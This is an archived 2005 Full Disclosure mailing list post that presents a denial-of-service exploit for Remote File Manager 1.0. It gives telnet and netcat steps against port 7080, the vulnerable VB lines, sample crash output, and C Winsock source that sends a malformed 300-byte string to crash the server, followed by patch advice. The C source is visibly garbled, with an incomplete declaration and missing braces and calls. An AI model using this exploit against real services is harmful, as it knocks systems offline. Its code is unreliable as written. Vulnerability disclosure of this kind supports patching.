Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Server Remote File Manager DOS Exploit
From: "eric basher" <basher13 () linuxmail org>
Date: Sun, 08 May 2005 23:26:04 +0800

8:13 PM 5/7/2005

" Server Remote File Manager DOS Exploit "

Vulnerable version:
Remote File Manager  1.0

Remote File Manager has function for client/server program ,allows user to 
remotely manage files on another computer via Winsock. 
It includes: upload file, download file, delete file, remove directory, 
get file information, and execute file. 

A denial of service or buffer overflow condition occurs when a 
text string is sent to the service data application.When is server
file manager connected/listening for incoming data from client,
sure is client not connected to server,we can send a text string
into server application that cause the program is disconnected/restarted.

Try use telnet then connect to specified IP and Port (ussualy port 7080),

telnet localhost 7080
<text> 'send text,this could server has recive type unformatted string,
that server need to close.

Take a look on mudules ModSession.bas;
dRet = Format(Bytes / 1024, "####################.##")

The source debug code will show,like;
Run-time error '13':
Type mismatch

This cause the size chunk has string '#'its not a empty field or 
has no number 
Other else we can use netcat to sending information file that can
cause server FileServer to crash,sample;

X:\>nc -vv localhost 7080
DNS fwd/rev mismatch: infamous-group != localhost
infamous-group [] 7080 (?) open

The source debug code will show,like;
Run-time error '9':
Subscript out of range

Take a look on ParseGetFileInfo ModSession.bas;
Set objFSO = New FileSystemObject
If Not objFSO.FileExists(sBuff(1)) Then ' Vulnerable string
sPacket = "FIN" & DELIM & "NonExist"

"FIN" this comand to get file information: "FIN"/File path
,if file is exists,the handle for script will cause out of range 
this could the program need to be restarted. 

  Server Remote File Manager DoS Exploit
   INFGP - Hacking&security Research

[+] Attacking  localhost..
[+] Build DOS string
[+] Buffer size = 300 byte
[+] Sending bad format..
[+] localhost  : Disconected!

Greats: Infam0us Gr0up,Zone-H,securiteam,str0ke-milw0rm,addict3d,
Thomas-secunia,Yudha,c0d3r,Kavling Community,1st Indonesian Security,
Jasakom,ECHO,etc..betst reagrds t0 whell.
Info: 98.to/infamous


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define size 300

int main (int argc, char *argv[]){

char req[] =

  unsigned int rc,addr,inetsock ;
  struct sockaddr_in tcp;
  struct hostent * hp;
  WSADATA wsaData;
  char buffer[size];


   if(argc < 2) {
  printf("\n\n    Server Remote File Manager DoS Exploit \n", argv[0]);
  printf("   -----------------------------------------\n", argv[0]);
  printf("      INFGP - Hacking&Security Research\n\n", argv[0]);
  printf("[-]Usage: %s [target]\n", argv[0]); 
  printf("[?]Exam: %s localhost \n", argv[0]); 
  exit(-1) ;
  if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("WSAStartup failed !\n");
   hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("Unable to resolve %s\n",argv[1]);
  if (!inetsock){
   printf("socket() error...\n");
   if (hp != NULL)
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
   tcp.sin_family = AF_INET;

  printf("\n[+] Attacking  %s..\n" , argv[1]) ;
  printf("[+] Build DOS string\n");
  printf("[+] Buffer size = %d byte\n" , sizeof(buffer));
  rc=connect(inetsock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  Sleep(1000) ;
  printf("[+] Sending bad format..\n") ;
  send(inetsock , buffer , sizeof(buffer) , 0);
  printf("[+] %s  : Disconected! \n\n" ,  argv[1]) ;
  else {
  printf("[-] Port :7080 is invalid.Server not connected!\n");

vendor was notified.
Other advice at mudules ModSession.bas,delete string '#' ;
dRet = Format(Bytes / 1024, "####################.##") ' Vulnerbale string
'#'delete this string to empty field ('dRet = Format(Bytes / 1024, "")')

Take a look on ParseGetFileInfo ModSession.bas;
Set objFSO = New FileSystemObject
If Not objFSO.FileExists(sBuff(1)) Then ' Vulnerable string
sPacket = "FIN" & DELIM & "NonExist"
Changes sBuff to 0 ,sample;
If Not objFSO.FileExists(sBuff(1))'Make 1 changes to 0 'sBuff(0))

This make a server File Server keep a going working as well.

Vendor URL:

Security Audit Tools:

Published by - basher13[basher13 () linuxmail org]
Check out the latest SMS services @ http://www.linuxmail.org
This allows you to send and receive SMS through your mailbox.

Powered by Outblaze
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Server Remote File Manager DOS Exploit eric basher (May 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]